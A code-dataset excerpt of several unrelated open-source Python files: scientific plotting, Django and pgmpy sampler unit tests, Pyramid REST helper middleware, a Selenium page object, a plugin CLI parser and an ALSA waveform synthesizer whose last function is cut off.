code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
Contains functions to plot the results of the dustydiffusion test.
@author: ibackus
"""
import matplotlib.pyplot as plt
import numpy as np
import pynbody
import diskpy
#sim, epsEstimator, ts, runpars = analyze.loadSim(simdir)
def crossSection(sim, ts, crossSectionTimes=(0, 1, 10)):
    """
    Reproduces the cross-section plot of dust density of
    Price & Laibe 2015, fig. 5

    Note, sim and ts can be loaded with analyze.loadSim(...)

    Parameters
    ----------
    sim : list
        List of SimSnaps for the simulation
    ts : array-like
        Snapshot times
    crossSectionTimes : array-like
        (optional) Sim times to plot (approximate; the nearest snapshot
        time is used).  Default is an immutable tuple to avoid the
        shared-mutable-default pitfall.
    """
    # Coerce to a flat 1D array.  np.atleast_1d handles scalars, lists and
    # arrays uniformly; the original reshape() made its subsequent
    # `ndim == 0` test unreachable dead code, which this replaces.
    crossSectionTimes = np.atleast_1d(np.asarray(crossSectionTimes)).ravel()
    nPlots = len(crossSectionTimes)
    # One square panel per requested time on a single figure.
    axs = diskpy.plot.gridplot(1, nPlots, square=True)
    fig = plt.gcf()
    for iPlot in range(nPlots):
        ax = axs[iPlot]
        # Snapshot whose time is closest to the requested plot time.
        iTime = abs(ts - crossSectionTimes[iPlot]).argmin()
        t = ts[iTime]
        f = sim[iTime]
        im = pynbody.plot.sph.image(f, 'dustFrac', width=1, log=False, vmin=0,
                                    vmax=0.11, cmap='cubehelix_r',
                                    show_cbar=False, subplot=ax, ret_im=True)
        ax.set_xlabel('t={:.2g}'.format(float(t)))
    # Shared colorbar in a dedicated axes on the right of the figure.
    fig.subplots_adjust(right=0.8)
    cbar_ax = fig.add_axes([0.85, 0.2, 0.05, 0.6])
    fig.colorbar(im, cax=cbar_ax)
    fig.set_size_inches(8.5, 3.4, forward=True)
    plt.suptitle('Cross section of dust fraction in z=0 plane\n'
                 'See Price & Laibe (2015)')
def dustFracProfile(sim, ts, epsEstimator,
                    epsPlotTimes=(0., 0.1, 0.3, 1, 3, 10), nr=200,
                    colorcode=True, legend=True, rasterized=True):
    """
    Plot radial dust-fraction profiles against the analytic estimate of
    P&L15 dustydiffusion.

    Note, sim and ts and epsEstimator can be loaded with analyze.loadSim(...)

    Parameters
    ----------
    sim : list
        List of SimSnaps for the simulation
    ts : array-like
        Snapshot times
    epsEstimator : function
        A function of (r, t) that returns the analytic estimate of the dust
        fraction density profile of P&L15 dustydiffusion
    epsPlotTimes : array-like
        Approximate times to plot at (nearest snapshot time is used)
    nr : int
        Number of radial bins
    colorcode : bool
        Color-code the times
    legend : bool
        Display legend
    rasterized : bool
        Rasterize the dots. Useful for saving figures as vector graphics
    """
    # Coerce plot times to a flat 1D array (scalars, lists and arrays).
    epsPlotTimes = np.atleast_1d(np.asarray(epsPlotTimes)).ravel()
    nt = len(epsPlotTimes)
    actualPlotTimes = np.zeros(nt)
    title = 'plot times: '
    # None lets matplotlib cycle a colour per time; 'k' forces black dots.
    markercolor = None if colorcode else 'k'
    for iPlot in range(nt):
        iTime = abs(ts - epsPlotTimes[iPlot]).argmin()
        f = sim[iTime]
        # Fancy indexing keeps t as a length-1 array (epsEstimator may
        # expect an array argument) -- extract the scalar explicitly,
        # since float() on a length-1 array is removed in modern numpy.
        t = ts[[iTime]]
        tval = float(t[0])
        actualPlotTimes[iPlot] = tval
        # print() form works under both Python 2 and 3 (was `print t`).
        print(t)
        r = np.linspace(0, f['r'].max(), nr)
        epsAnalytic = epsEstimator(r, t)
        # Plot simulation particles and the analytic profile.
        scatter = plt.plot(f['r'], f['dustFrac'], 'o', markersize=3,
                           markeredgecolor='none',
                           label='t={:.2g}'.format(tval),
                           color=markercolor, rasterized=rasterized)
        line = plt.plot(r, epsAnalytic, 'r')
        if colorcode:
            # Make lines and points the same color
            line[0].set_color(scatter[0].get_color())
        title += '{:.2g}, '.format(tval)
    # Set-up plot
    plt.ylim(0, 0.11)
    plt.xlim(0, 0.5)
    plt.ylabel('Dust fraction')
    plt.xlabel('r')
    if legend:
        plt.legend(loc='best', markerscale=2)
    plt.title(title)
| ibackus/testdust | testdust/diffusion/plot.py | Python | mit | 4,000 |
# coding: utf-8
from django.test import TestCase
from django.db import IntegrityError
from datetime import datetime
from eventex.subscriptions.models import Subscription
class SubscriptionTest(TestCase):
    """Unit tests for the Subscription model: creation, created_at,
    text representation and the `paid` default.

    NOTE(review): test_unicode uses the Python 2 `unicode` builtin, so
    this suite runs on Python 2 only.
    """
    def setUp(self):
        # Unsaved instance shared by the tests below.
        self.obj = Subscription(
            name='Henrique Bastos',
            cpf='12345678901',
            email='henrique@bastos.net',
            phone='21-96186180'
        )
    def test_create(self):
        """
        Subscription must have name, cpf, email, phone
        """
        self.obj.save()
        # First row saved into the empty test database gets pk == 1.
        self.assertEqual(1, self.obj.pk)
    def test_has_created_at(self):
        """
        Subscription must have automatic created_at.
        """
        self.obj.save()
        self.assertIsInstance(self.obj.created_at, datetime)
    def test_unicode(self):
        """Instances must render as their name."""
        self.assertEqual(u'Henrique Bastos', unicode(self.obj))
    def test_paid_default_value_is_False(self):
        """
        By default paid must be False.
        """
        self.assertEqual(False, self.obj.paid)
class SubscriptionUniqueTest(TestCase):
    """Uniqueness rules: cpf must be unique, email may repeat."""
    def setUp(self):
        # Create a first entry to force collision.
        Subscription.objects.create(name='Henrique Bastos', cpf='12345678901',
                                    email='henrique@bastos.net', phone='21-96186180')
    def test_cpf_unique(self):
        """
        CPF must be unique
        """
        s = Subscription(name='Henrique Bastos', cpf='12345678901',
                         email='outro@email.com', phone='21-96186180')
        # Saving a duplicate cpf must violate the database constraint.
        self.assertRaises(IntegrityError, s.save)
    def test_email_can_repeat(self):
        """
        Email is not unique anymore.
        """
        s = Subscription.objects.create(name='Henrique Bastos', cpf='00000000011',
                                        email='henrique@bastos.net')
        # A second row was created, so the duplicate email was accepted.
        self.assertEqual(2, s.pk)
| klebercode/lionsclub | eventi/subscriptions/tests/test_models.py | Python | mit | 1,854 |
import unittest
import numpy as np
from pgmpy.factors.continuous import JointGaussianDistribution as JGD
from pgmpy.sampling import (HamiltonianMC as HMC, HamiltonianMCDA as HMCda, GradLogPDFGaussian, NoUTurnSampler as NUTS,
NoUTurnSamplerDA as NUTSda)
class TestHMCInference(unittest.TestCase):
    """Hamiltonian Monte Carlo tests (plain HMC and dual-averaging HMCda)
    against a 3-dimensional Gaussian target distribution."""
    def setUp(self):
        # 3D Gaussian target and a dual-averaging HMC sampler over it.
        mean = [-1, 1, -1]
        covariance = np.array([[3, 0.8, 0.2], [0.8, 2, 0.3], [0.2, 0.3, 1]])
        self.test_model = JGD(['x', 'y', 'z'], mean, covariance)
        self.hmc_sampler = HMCda(model=self.test_model, grad_log_pdf=GradLogPDFGaussian)
    def test_errors(self):
        """Invalid constructor/sampling arguments raise TypeError or
        ValueError as appropriate."""
        with self.assertRaises(TypeError):
            HMCda(model=self.test_model, grad_log_pdf=1)
        with self.assertRaises(TypeError):
            HMCda(model=self.test_model, grad_log_pdf=GradLogPDFGaussian, simulate_dynamics=1)
        with self.assertRaises(ValueError):
            HMCda(model=self.test_model, delta=-1)
        with self.assertRaises(TypeError):
            self.hmc_sampler.sample(initial_pos=1, num_adapt=1, num_samples=1, trajectory_length=1)
        with self.assertRaises(TypeError):
            # .send(None) starts the generator so validation actually runs.
            self.hmc_sampler.generate_sample(1, 1, 1, 1).send(None)
        with self.assertRaises(TypeError):
            HMC(model=self.test_model).sample(initial_pos=1, num_samples=1, trajectory_length=1)
        with self.assertRaises(TypeError):
            HMC(model=self.test_model).generate_sample(1, 1, 1).send(None)
    def test_acceptance_prob(self):
        """Acceptance probability matches a precomputed reference value."""
        acceptance_probability = self.hmc_sampler._acceptance_prob(np.array([1, 2, 3]), np.array([2, 3, 4]),
                                                                   np.array([1, -1, 1]), np.array([0, 0, 0]))
        np.testing.assert_almost_equal(acceptance_probability, 0.0347363)
    def test_find_resonable_stepsize(self):
        """Heuristic stepsize search is deterministic under a fixed seed."""
        np.random.seed(987654321)
        stepsize = self.hmc_sampler._find_reasonable_stepsize(np.array([-1, 1, -1]))
        np.testing.assert_almost_equal(stepsize, 2.0)
    def test_adapt_params(self):
        """Dual-averaging parameter update matches precomputed values."""
        stepsize, stepsize_bar, h_bar = self.hmc_sampler._adapt_params(0.0025, 1, 1, np.log(0.025), 2, 1)
        np.testing.assert_almost_equal(stepsize, 3.13439452e-13)
        np.testing.assert_almost_equal(stepsize_bar, 3.6742481e-08)
        np.testing.assert_almost_equal(h_bar, 0.8875)
    def test_sample(self):
        """Sample covariance approaches the target covariance; adaptive
        runs (num_adapt > 0) are held to a tighter tolerance (0.3 vs 3)."""
        # Seeding is done for _find_reasonable_stepsize method
        # Testing sample method simple HMC
        np.random.seed(3124141)
        samples = self.hmc_sampler.sample(initial_pos=[0.3, 0.4, 0.2], num_adapt=0,
                                          num_samples=10000, trajectory_length=4)
        covariance = np.cov(samples.values.T)
        self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 3)
        # Testing sample of method of HMCda
        np.random.seed(3124141)
        samples = self.hmc_sampler.sample(initial_pos=[0.6, 0.2, 0.8], num_adapt=10000,
                                          num_samples=10000, trajectory_length=4)
        covariance = np.cov(samples.values.T)
        self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 0.3)
        # Testing generate_sample method of simple HMC
        np.random.seed(3124141)
        gen_samples = self.hmc_sampler.generate_sample(initial_pos=[0.3, 0.4, 0.2], num_adapt=0,
                                                       num_samples=10000, trajectory_length=4)
        samples = np.array([sample for sample in gen_samples])
        covariance = np.cov(samples.T)
        self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 3)
        # Testing sample of method of HMCda
        np.random.seed(3124141)
        gen_samples = self.hmc_sampler.generate_sample(initial_pos=[0.6, 0.2, 0.8], num_adapt=10000,
                                                       num_samples=10000, trajectory_length=4)
        samples = np.array([sample for sample in gen_samples])
        covariance = np.cov(samples.T)
        self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 0.3)
    def tearDown(self):
        del self.hmc_sampler
        del self.test_model
class TestNUTSInference(unittest.TestCase):
    """No-U-Turn Sampler tests (plain NUTS and dual-averaging NUTSda)
    against a 3-dimensional Gaussian target distribution."""
    def setUp(self):
        mean = np.array([-1, 1, 0])
        covariance = np.array([[6, 0.7, 0.2], [0.7, 3, 0.9], [0.2, 0.9, 1]])
        self.test_model = JGD(['x', 'y', 'z'], mean, covariance)
        self.nuts_sampler = NUTSda(model=self.test_model, grad_log_pdf=GradLogPDFGaussian)
    def test_errors(self):
        """Invalid arguments raise TypeError (wrong types) or ValueError
        (delta out of [0, 1], initial_pos of wrong dimension)."""
        with self.assertRaises(TypeError):
            NUTS(model=self.test_model, grad_log_pdf=JGD)
        with self.assertRaises(TypeError):
            NUTS(model=self.test_model, grad_log_pdf=None, simulate_dynamics=GradLogPDFGaussian)
        with self.assertRaises(ValueError):
            NUTSda(model=self.test_model, delta=-0.2, grad_log_pdf=None)
        with self.assertRaises(ValueError):
            NUTSda(model=self.test_model, delta=1.1, grad_log_pdf=GradLogPDFGaussian)
        with self.assertRaises(TypeError):
            NUTS(self.test_model, GradLogPDFGaussian).sample(initial_pos={1, 1, 1}, num_samples=1)
        with self.assertRaises(ValueError):
            NUTS(self.test_model, GradLogPDFGaussian).sample(initial_pos=[1, 1], num_samples=1)
        with self.assertRaises(TypeError):
            NUTSda(self.test_model, GradLogPDFGaussian).sample(initial_pos=1, num_samples=1, num_adapt=1)
        with self.assertRaises(ValueError):
            NUTSda(self.test_model, GradLogPDFGaussian).sample(initial_pos=[1, 1, 1, 1], num_samples=1, num_adapt=1)
        with self.assertRaises(TypeError):
            # .send(None) starts the generator so validation actually runs.
            NUTS(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=0.1, num_samples=1).send(None)
        with self.assertRaises(ValueError):
            NUTS(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=(0, 1, 1, 1),
                                                                      num_samples=1).send(None)
        with self.assertRaises(TypeError):
            NUTSda(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=[[1, 2, 3]], num_samples=1,
                                                                        num_adapt=1).send(None)
        with self.assertRaises(ValueError):
            NUTSda(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=[1], num_samples=1,
                                                                        num_adapt=1).send(None)
    def test_sampling(self):
        """Sample covariance converges to the target covariance; adaptive
        runs (num_adapt > 0) are held to a tighter tolerance (0.4 vs 3)."""
        np.random.seed(1010101)
        samples = self.nuts_sampler.sample(initial_pos=[-0.4, 1, 3.6], num_adapt=0, num_samples=10000,
                                           return_type='recarray')
        sample_array = np.array([samples[var_name] for var_name in self.test_model.variables])
        sample_covariance = np.cov(sample_array)
        self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 3)
        np.random.seed(1210161)
        samples = self.nuts_sampler.generate_sample(initial_pos=[-0.4, 1, 3.6], num_adapt=0, num_samples=10000)
        samples_array = np.array([sample for sample in samples])
        sample_covariance = np.cov(samples_array.T)
        self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 3)
        np.random.seed(12313131)
        samples = self.nuts_sampler.sample(initial_pos=[0.2, 0.4, 2.2], num_adapt=10000, num_samples=10000)
        sample_covariance = np.cov(samples.values.T)
        self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 0.4)
        np.random.seed(921312312)
        samples = self.nuts_sampler.generate_sample(initial_pos=[0.2, 0.4, 2.2], num_adapt=10000, num_samples=10000)
        samples_array = np.array([sample for sample in samples])
        sample_covariance = np.cov(samples_array.T)
        self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 0.4)
    def tearDown(self):
        del self.test_model
        del self.nuts_sampler
| sandeepkrjha/pgmpy | pgmpy/tests/test_sampling/test_continuous_sampling.py | Python | mit | 8,100 |
import io
import unittest
from unittest.mock import patch
from kattis import k_hnumbers
###############################################################################
class SampleInput(unittest.TestCase):
    '''Problem statement sample inputs and outputs'''
    def test_sample_input(self):
        '''Run and assert problem statement sample input and output.'''
        inputs = []
        inputs.append('21')
        inputs.append('85')
        inputs.append('789')
        # Final '0' line: presumably the input terminator for the solver
        # -- confirm against the Kattis problem statement.
        inputs.append('0')
        inputs = '\n'.join(inputs) + '\n'
        outputs = []
        outputs.append('21 0')
        outputs.append('85 5')
        outputs.append('789 62')
        outputs = '\n'.join(outputs) + '\n'
        # Feed the sample via a patched stdin and capture stdout.
        with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
             patch('sys.stdout', new_callable=io.StringIO) as stdout:
            k_hnumbers.main()
        self.assertEqual(stdout.getvalue(), outputs)
        # The solution must have consumed all of its input.
        self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
| ivanlyon/exercises | test/test_k_hnumbers.py | Python | mit | 1,101 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
package documentation
"""
from Automation.instancelist import main
if __name__ == '__main__':
    # Delegate to the Automation.instancelist CLI entry point.
    main()
| appcito/automation-tool | instancelist-cli.py | Python | mit | 163 |
# -*- coding: utf-8 -*-
"""
Useful classes and methods to aid RESTful webservice development in Pyramid.
PythonPro Limited
2012-01-14
"""
import json
import httplib
import logging
import traceback
#from decorator import decorator
from pyramid.request import Response
def get_log(e=None):
    """Return this module's logger, optionally extended with suffix *e*."""
    name = __name__
    if e:
        name = "{0}.{1}".format(name, e)
    return logging.getLogger(name)
def json_result(view_callable):
    """Wrap a view so its return value is delivered in a status dict.

    rc = {
        "success": True | False,
        "data": ...,
        "message", "ok" | "..message explaining result=False..",
    }

    The data field will contain whatever is returned from the wrapped
    view, i.e. any valid type.  Exceptions are handled elsewhere.
    """
    def inner(request, *args):
        """Invoke the view and wrap its result in the success envelope."""
        return {
            "success": True,
            "data": view_callable(request, *args),
            "message": "ok",
        }
    return inner
def status_body(
    success=True, data=None, message="", to_json=False, traceback='',
):
    """Create a response body dict (or JSON string) for status reporting.

    :param success: True (default) or False.
    :param data: payload of the response; default None.
    :param message: human-readable explanation; default "".
    :param to_json: when True return a JSON string, when False (default)
        return the dict.  False is used where something else takes care
        of the JSON conversion.
    :param traceback: optional traceback text; only included when
        non-empty.  TODO: switch tracebacks off for production.
    :returns: dict (or its JSON encoding) of the form::

        {"success": True | False, "data": ..., "message": "...",
         ["traceback": "..."]}
    """
    payload = {
        "success": success,
        "data": data,
        "message": message,
    }
    if traceback:
        payload["traceback"] = traceback
    return json.dumps(payload) if to_json else payload
def status_err(exc, tb):
    """ Generate an error status response from an exception and traceback

    :param exc: the caught exception instance.
    :param tb: formatted traceback string.
    :returns: a status_body dict with success=False, the exception text
        as data, the exception class name as the message and the
        traceback attached.
    """
    # BUGFIX: the original passed four positional args, so `tb` landed in
    # the to_json parameter and collided with the explicit to_json=False
    # keyword -- every call raised TypeError.  Explicit keywords put each
    # value into the intended parameter (success must also be a bool, not
    # the string "error").
    return status_body(
        success=False,
        data=str(exc),
        message=exc.__class__.__name__,
        traceback=tb,
        to_json=False,
    )
#@decorator
def status_wrapper(f, *args, **kw):
    """ Decorate a view function to wrap up its response in the status_body
    gumph from above, and handle all exceptions.

    On success the view's return value is placed in the message field of
    the status body; on failure the exception is logged and converted via
    status_err.  Intended for use with the (commented-out) decorator
    module import at the top of the file.
    """
    try:
        res = f(*args, **kw)
        return status_body(message=res, to_json=False)
    # Python 2 `except ..., e` syntax: this module is Python 2 only.
    except Exception, e:
        tb = traceback.format_exc()
        get_log().exception(tb)
        return status_err(e, tb)
def notfound_404_view(request):
    """A custom 404 view returning JSON error message body instead of HTML.

    :returns: a JSON response with the body::

        json.dumps(dict(error="URI Not Found '...'"))

    NOTE(review): the status/content type are set on ``request.response``
    but a fresh ``Response(body)`` is returned, so the returned response
    may not carry them -- confirm this is intended (compare xyz_handler,
    which sets them on the returned Response).
    """
    msg = str(request.exception.message)
    get_log().info("notfound_404_view: URI '%s' not found!" % str(msg))
    request.response.status = httplib.NOT_FOUND
    request.response.content_type = "application/json"
    body = status_body(
        success=False,
        message="URI Not Found '%s'" % msg,
    )
    return Response(body)
def xyz_handler(status):
    """Build a Pyramid exception-view handler for the given HTTP *status*
    that returns a JSON error message body instead of HTML.

    :param status: the HTTP status string/code to put on the response.
    :returns: a handler(request) callable producing a JSON response with
        the body::

        json.dumps(dict(error="URI Not Found '...'"))
    """
    log = get_log()
    def handler(request):
        # Log the wrapped exception's message together with the status.
        msg = str(request.exception.message)
        log.info("xyz_handler (%s): %s" % (status, str(msg)))
        #request.response.status = status
        #request.response.content_type = "application/json"
        body = status_body(
            success=False,
            message=msg,
            to_json=True,
        )
        # Status and content type are set on the Response actually
        # returned (the request.response variants above are disabled).
        rc = Response(body)
        rc.status = status
        rc.content_type = "application/json"
        return rc
    return handler
# Reference:
# * http://zhuoqiang.me/a/restful-pyramid
#
class HttpMethodOverrideMiddleware(object):
    '''WSGI middleware for overriding HTTP Request Method for RESTful support

    A POST carrying an X-HTTP-Method-Override header naming PUT, DELETE,
    OPTIONS or PATCH is rewritten to that method before reaching the
    wrapped application; the transport-level method is preserved in
    environ['http_method_override.original_method'].
    '''

    _OVERRIDABLE = ('PUT', 'DELETE', 'OPTIONS', 'PATCH')

    def __init__(self, application):
        self.application = application

    def __call__(self, environ, start_response):
        if environ['REQUEST_METHOD'] == 'POST':
            # Only the "X-HTTP-Method-Override" header is consulted (the
            # "_method" form-parameter variant was never enabled).
            override = environ.get('HTTP_X_HTTP_METHOD_OVERRIDE', '').upper()
            if override in self._OVERRIDABLE:
                # Save the original HTTP method, then rewrite it.
                environ['http_method_override.original_method'] = \
                    environ['REQUEST_METHOD']
                environ['REQUEST_METHOD'] = override
        return self.application(environ, start_response)
class JSONErrorHandler(object):
    """Capture exceptions usefully and return to aid the client side.

    WSGI middleware: for requests with a JSON content type, uncaught
    exceptions become a 500 response whose body is a status_body error
    envelope; other requests re-raise so an upstream handler can render
    HTML.

    :returns: status_body set for an error.

    E.g.::

        rc = {
            "success": True | False,
            "data": ...,
            "message", "..message explaining result=False..",
        }

    the data field will contain the formatted traceback.
    """
    def __init__(self, application):
        # Wrapped WSGI application.
        self.app = application
        self.log = get_log("JSONErrorHandler")
    def formatError(self):
        """Return a string representing the last traceback.
        """
        exception, instance, tb = traceback.sys.exc_info()
        error = "".join(traceback.format_tb(tb))
        return error
    def __call__(self, environ, start_response):
        try:
            return self.app(environ, start_response)
        # Python 2 `except ..., e` syntax: this module is Python 2 only.
        except Exception, e:
            self.log.exception("error: ")
            ctype = environ.get('CONTENT_TYPE')
            if ctype == "application/json":
                self.log.debug("Request was in JSON responding with JSON.")
                errmsg = "%d %s" % (
                    httplib.INTERNAL_SERVER_ERROR,
                    httplib.responses[httplib.INTERNAL_SERVER_ERROR]
                )
                start_response(errmsg, [('Content-Type', 'application/json')])
                message = str(e)
                error = "%s" % (type(e).__name__)
                self.log.error("%s: %s" % (error, message))
                return status_body(
                    success=False,
                    # Should this be disabled on production?
                    data=self.formatError(),
                    message=message,
                    # I need to JSON encode it as the view never finished and
                    # the requestor is expecting a JSON response status.
                    to_json=True,
                )
            else:
                # Non-JSON request: let the exception propagate.
                raise
| oisinmulvihill/stats-service | stats_service/service/restfulhelpers.py | Python | mit | 7,229 |
from django import forms
from django.forms.models import inlineformset_factory
from cruditor.forms import (
CruditorFormsetFormMixin, CruditorFormsetMixin, CruditorTapeformMixin)
from examples.store.models import Person, RelatedPerson
class PersonForm(CruditorTapeformMixin, forms.ModelForm):
    """Tapeform-styled ModelForm covering every Person field."""
    # Rendered as separate date and time inputs.
    reminder = forms.SplitDateTimeField()
    class Meta:
        model = Person
        fields = '__all__'
class RelatedPersonForm(CruditorFormsetFormMixin, forms.ModelForm):
    """Formset-aware form covering every RelatedPerson field."""
    class Meta:
        model = RelatedPerson
        fields = '__all__'
class RelatedPersonFormset(CruditorFormsetMixin, inlineformset_factory(
    Person, RelatedPerson, extra=1, form=RelatedPersonForm
)):
    """Inline formset editing RelatedPerson rows attached to one Person."""
    pass
| moccu/django-cruditor | examples/formset/forms.py | Python | mit | 700 |
from hubcheck.pageobjects.basepageobject import BasePageObject
from hubcheck.pageobjects.basepageelement import Link
from selenium.common.exceptions import NoSuchElementException
class GenericPage(BasePageObject):
    """Generic Page with just a header and footer"""
    def __init__(self, browser, catalog):
        super(GenericPage, self).__init__(browser, catalog)
        self.path = '/'
        # Resolve the hub-specific component classes from the catalog.
        GenericPage_Locators = self.load_class('GenericPage_Locators')
        NeedHelpForm = self.load_class('NeedHelpForm')
        Header = self.load_class('Header')
        Footer = self.load_class('Footer')
        # This page's element locators come from the hub's locator class.
        self.locators = GenericPage_Locators.locators
        # Child page-object components.
        self.needhelpform = NeedHelpForm(self, {}, self.__refreshCaptchaCB)
        self.needhelplink = Link(self, {'base': 'needhelplink'})
        self.header = Header(self)
        # self.footer = Footer(self)
    def __refreshCaptchaCB(self):
        """Reload the page and reopen the need-help form (captcha refresh)."""
        self._browser.refresh()
        self.needhelplink.click()
    def goto_login(self):
        """Navigate to the login page via the header."""
        return self.header.goto_login()
    def goto_register(self):
        """Navigate to the registration page via the header."""
        return self.header.goto_register()
    def goto_logout(self):
        """Log the current user out via the header."""
        return self.header.goto_logout()
    def goto_myaccount(self):
        """Navigate to the "my account" page via the header."""
        return self.header.goto_myaccount()
    def goto_profile(self):
        """Navigate to the profile page via the header."""
        return self.header.goto_profile()
    def toggle_needhelp(self):
        """Open or close the need-help form."""
        return self.needhelplink.click()
    def is_logged_in(self):
        """check if user is logged in, returns True or False"""
        return self.header.is_logged_in()
    def get_account_number(self):
        """return the account number of a logged in user based on urls"""
        if not self.is_logged_in():
            raise RuntimeError("user is not logged in")
        return self.header.get_account_number()
    def _visible_text(self, key):
        """Collect the text of every displayed element for a locator key."""
        return [e.text
                for e in self.find_elements(self.locators[key])
                if e.is_displayed()]
    def get_debug_info(self):
        """Return text of any visible debug output."""
        return self._visible_text('debug')
    def get_notification_info(self):
        """Return text of any visible page notifications."""
        return self._visible_text('notification')
    def get_success_info(self):
        """Return text of any visible success messages."""
        return self._visible_text('success')
    def get_error_info(self):
        """Return text of any visible error messages."""
        return self._visible_text('error')
    def get_errorbox_info(self):
        """Return text of visible error boxes (both locator variants)."""
        return self._visible_text('errorbox1') + self._visible_text('errorbox2')
class GenericPage_Locators_Base_1(object):
    """
    locators for GenericPage object
    """
    # CSS selectors used by GenericPage to locate the need-help link and
    # the various status/message containers on the page.
    locators = {
        'needhelplink' : "css=#tab",
        'debug' : "css=#system-debug",
        'error' : "css=.error",
        'success' : "css=.passed",
        'notification' : "css=#page_notifications",
        'errorbox1' : "css=#errorbox",
        'errorbox2' : "css=#error-box",
    }
| codedsk/hubcheck | hubcheck/pageobjects/po_generic_page.py | Python | mit | 3,505 |
from datetime import datetime
from argparse import ArgumentParser
import pprint
import time
import warnings
import os, sys, io
import signal
import beretta
import importlib
__author__ = 'holly'
class Parser(object):
    """Command-line front end: one argparse sub-command per discovered
    beretta plugin, dispatching to the selected plugin."""
    def __init__(self):
        self.parser = ArgumentParser(description=beretta.__doc__)
        self.parser.add_argument('--version', action='version',
                                 version='%(prog)s ' + beretta.__version__)
        self.subparsers = self.parser.add_subparsers(help='sub-command --help',
                                                     dest='subparser_name')
    def run(self, loader=None):
        """Register every plugin as a sub-command, parse argv and run the
        chosen plugin; print help when no valid sub-command is given."""
        if loader is None:
            loader = importlib.import_module("beretta.loader").Loader()
        registry = {}
        for plugin_name, module in loader.plugins():
            plugin = module.Plugin(plugin_name)
            sub = self.subparsers.add_parser(plugin.name, help=plugin.help,
                                             description=plugin.desc)
            for pargs, pkwargs in plugin.arguments():
                sub.add_argument(*pargs, **pkwargs)
            registry[plugin_name] = plugin
        args = self.parser.parse_args()
        if args.subparser_name in registry:
            registry[args.subparser_name].run_plugin(args)
        else:
            self.parser.print_help()
| holly/beretta | lib/beretta/parser.py | Python | mit | 1,231 |
import alsaaudio
from math import pi, sin, pow
import getch
# Playback configuration for the ALSA PCM device.
SAMPLE_RATE = 44100
# 8-bit unsigned samples: values 0..255, centred at 128.
FORMAT = alsaaudio.PCM_FORMAT_U8
PERIOD_SIZE = 512   # frames written to ALSA per period
N_SAMPLES = 1024    # samples in one full cycle of each wavetable
notes = "abcdefg"
frequencies = {}
# NOTE(review): 2**(1/2) steps give quarter-octave spacing, not the usual
# 2**(1/12) semitone -- confirm this note spacing is intentional.
for i, note in enumerate(notes):
    frequencies[note] = 440 * pow(pow(2, 1/2), i)
# Generate one cycle of each waveform as signed amplitudes in [-128, 127],
# centered at y=0, with N_SAMPLES samples per cycle.
sine_wave = [int(sin(x * 2*pi/N_SAMPLES) * 127) for x in range(0, N_SAMPLES)]
square_wave = []
sawtooth_wave = []
triangle_wave = []
for i in range(0, N_SAMPLES):
    # BUGFIX: the original wrote `... % 2*pi`, which parses as
    # `(... % 2) * pi` and wrapped the phase several times per cycle,
    # distorting all three waveforms.  The phase must be reduced mod 2*pi.
    phase = (i * 2*pi / N_SAMPLES) % (2*pi)
    if phase < pi:
        square_wave.append(127)
    else:
        square_wave.append(-128)
    # Sawtooth falls linearly from +127 across the whole cycle.
    sawtooth_wave.append(int(127 - (127 // pi * phase)))
    # Triangle rises over the first half-cycle, falls over the second.
    if phase < pi:
        triangle_wave.append(int(-127 + (2 * 127 * phase // pi)))
    else:
        triangle_wave.append(int(3 * 127 - (2 * 127 * phase // pi)))
def main():
    """Interactive synth loop: keys 1-5 switch the played waveform,
    'q' quits.  Requires an ALSA playback device and a terminal for
    getch; audio is mono 8-bit unsigned at SAMPLE_RATE."""
    buf = bytearray(PERIOD_SIZE)
    # alsaaudio setup
    dev = alsaaudio.PCM(type=alsaaudio.PCM_PLAYBACK)
    dev.setchannels(1)
    dev.setrate(SAMPLE_RATE)
    dev.setformat(FORMAT)
    dev.setperiodsize(PERIOD_SIZE)
    #load_buf(buf, 440)
    f = 440
    # Half-amplitude sine, shifted to the unsigned 0..255 range.
    w_half = [x//2 + 128 for x in make_wave(sine_wave, f)]
    # Commented-out harmonic-mixing experiment kept by the author.
    #w_o1 = [x//4 for x in make_wave(f*2)]
    #w_o2 = [x//6 for x in make_wave(f*3)]
    #w_o3 = [x//8 for x in make_wave(f*4)]
    #w_o4 = [x//10 for x in make_wave(f*5)]
    #w_o4 = [x//12 for x in make_wave(f*6)]
    #w_o5 = [x//14 for x in make_wave(f*7)]
    #w_o6 = [x//16 for x in make_wave(f*8)]
    #for i, samp in enumerate(w_o1):
    #    w[i] += samp + w_o2[i] + w_o3[i] + w_o4[i] + w_o5[i] + w_o6[i] + 128
    #    print(w[i])
    #buf = bytearray(w)
    #for i, samp in enumerate(w):
    #    if samp > 0:
    #        samp = 127
    #    else:
    #        samp = -128
    # Start with a full-amplitude square wave at 440 Hz.
    w = [x + 128 for x in make_wave(square_wave, 440)]
    buf = bytearray(w)
    char = getch.getch()
    last = 'q'
    while char != 'q':
        # Rebuild the buffer only when the key actually changed.
        if char != last:
            if char == '1':
                w = [x//2 + 128 for x in make_wave(sine_wave, 440)]
                buf = bytearray(w)
            elif char == '2':
                w = [x//2 + 128 for x in make_wave(square_wave, 440)]
                buf = bytearray(w)
            elif char == '3':
                w = [x//2 + 128 for x in make_wave(sawtooth_wave, 440)]
                buf = bytearray(w)
            elif char == '4':
                w = [x//2 + 128 for x in make_wave(triangle_wave, 440)]
                buf = bytearray(w)
            elif char == '5':
                buf = bytearray(w_half)
        # Write three periods per keypress poll.
        dev.write(buf)
        dev.write(buf)
        dev.write(buf)
        last = char
        char = getch.getch()
    return 0
#def load_buf(buf, frequency):
